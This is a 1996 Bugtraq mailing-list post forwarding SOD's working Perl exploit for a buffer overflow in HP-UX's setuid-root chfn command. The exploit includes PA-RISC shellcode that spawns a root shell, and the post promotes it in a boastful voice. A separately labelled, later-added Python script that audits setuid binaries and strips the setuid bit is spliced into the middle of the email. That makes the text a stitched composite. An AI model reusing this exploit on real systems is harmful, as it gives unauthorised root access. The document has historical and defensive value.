[3770] in bugtraq
the HP Bug of the Week!
daemon@ATHENA.MIT.EDU (Aleph One)
Mon Dec 9 04:17:25 1996
Date: Mon, 9 Dec 1996 02:47:46 -0600
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
From our friends at SOD:
This week: the continuing saga of buffer overflows in setuid root
programs
Amid the struggle of the terrible workaday week, among the lost
broken-hearted keypunching drones, alongside the workers in the
dreaded server farm, Our Hero bravely sends the legally forbidden
datastream across the burning wires toward a cold and lifeless shell
of a shell. The electrons twist! The binary bits battle! The data bus
swerves sharply to avoid hitting the eclectic keywords! Was the script
executed in time to save Our Hero and his lovely Mistress? Were the
exploitable programs still enabled setuid root? Will the buffers spill
onto the stack and leave way to run a small semblance of illicit code?
Of course they will, and you don't have to tune in next week to find
out, either. This week, the chfn command happily runs some code for us
as root, and Otto Sync joins us as an honorary Scriptor with his
exploits written especially for HP's OpenCall Service Control Point
platform for SS7 telephony use -- oh, I don't know how well Alcatel is
going to like this one! So snarf it, pop it open, and suck it down,
and as always remember to start clicking your way to root access with
scripts from those Superhero kind of folks at SOD.
_________________________________________________________________
Caveat Emptor
of.chfn changes uid's, too! script for this week
_________________________________________________________________
#!/usr/bin/perl
use FileHandle;
sub h2cs {
    local($stuff)=@_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;
        $stuff =~ s/^..//;
        $rv.=chr(oct("0x${bob}"));
    }
    return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
    $offset=2070;
    $prealign="AA";
    $postalign="PPPP";
    $pcoq=h2cs("7b03A013");
} else {
    $offset=2070;
    $prealign="AA";
    $postalign="PPPP";
    $pcoq=h2cs("7b033013");
}
$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg0,arg0,arg0
$code.=h2cs("0b180298"); # XOR arg0,arg0,arg0
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/usr/bin/chfn","$of");
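The post's own question, "were the exploitable programs still enabled setuid root?", is the one an administrator has to answer for every such advisory. The following is an added example, not part of the original Bugtraq post or of SOD's script: a small audit that inventories set-user-ID and set-group-ID executables under a set of roots and, for a program known to be overflowable, clears the setuid bit as the interim mitigation until a vendor fix is installed. It assumes a POSIX filesystem; the directory tree it builds (fake-chfn, fake-wall, plain, link) is constructed test data, not real system binaries.

```python
"""Audit set-user-ID / set-group-ID executables and strip the bit as mitigation.

Added example for the chfn advisory above; assumes a POSIX filesystem.
"""
import os
import shutil
import stat
import tempfile
from dataclasses import dataclass
from typing import Iterator, List


@dataclass(frozen=True)
class SuidEntry:
    path: str
    uid: int
    gid: int
    mode: int          # full st_mode as reported by lstat
    setuid: bool
    setgid: bool

    @property
    def root_owned(self) -> bool:
        """True for the dangerous case: setuid and owned by uid 0."""
        return self.setuid and self.uid == 0


def scan_suid(roots: List[str]) -> Iterator[SuidEntry]:
    """Walk each root and yield regular files with S_ISUID or S_ISGID set.

    lstat is used, so symlinks are neither followed nor counted: a link to a
    setuid binary elsewhere is not reported twice and a link loop cannot trap
    the walk. Unreadable entries are skipped rather than aborting the audit.
    """
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                su = bool(st.st_mode & stat.S_ISUID)
                sg = bool(st.st_mode & stat.S_ISGID)
                if su or sg:
                    yield SuidEntry(full, st.st_uid, st.st_gid, st.st_mode, su, sg)


def strip_setuid(path: str) -> int:
    """Clear setuid and setgid on path; return the new permission bits.

    Interim mitigation for a known-overflowable setuid program: root can still
    run it, but an ordinary user who overflows it now gets only their own uid.
    """
    st = os.lstat(path)
    new_mode = stat.S_IMODE(st.st_mode) & ~(stat.S_ISUID | stat.S_ISGID)
    os.chmod(path, new_mode)
    return new_mode


def build_fixture() -> str:
    """Constructed test tree (not real binaries): fake-chfn is setuid,
    fake-wall is setgid, plain has neither, link points at fake-chfn."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(base, "bin")
    os.mkdir(bindir)
    for name, mode in (("fake-chfn", 0o4755), ("fake-wall", 0o2755), ("plain", 0o755)):
        p = os.path.join(bindir, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho placeholder\n")
        os.chmod(p, mode)
    os.symlink(os.path.join(bindir, "fake-chfn"), os.path.join(bindir, "link"))
    return base


def run_demo() -> dict:
    """Scan the fixture, strip the bit from fake-chfn, scan again."""
    base = build_fixture()
    try:
        before = sorted(os.path.basename(e.path) for e in scan_suid([base]))
        new_mode = strip_setuid(os.path.join(base, "bin", "fake-chfn"))
        after = sorted(os.path.basename(e.path) for e in scan_suid([base]))
        return {"before": before, "after": after, "new_mode": new_mode}
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for entry in scan_suid(["/usr/bin", "/bin"]):
        flag = "ROOT-SETUID" if entry.root_owned else "setgid/other"
        print(f"{entry.path}\t{oct(stat.S_IMODE(entry.mode))}\tuid={entry.uid}\t{flag}")
```

Run it as-is to list setuid and setgid files under /usr/bin and /bin; run_demo() shows the strip step against the constructed tree only, so nothing on the real system is changed unless strip_setuid is called on a real path deliberately.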
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01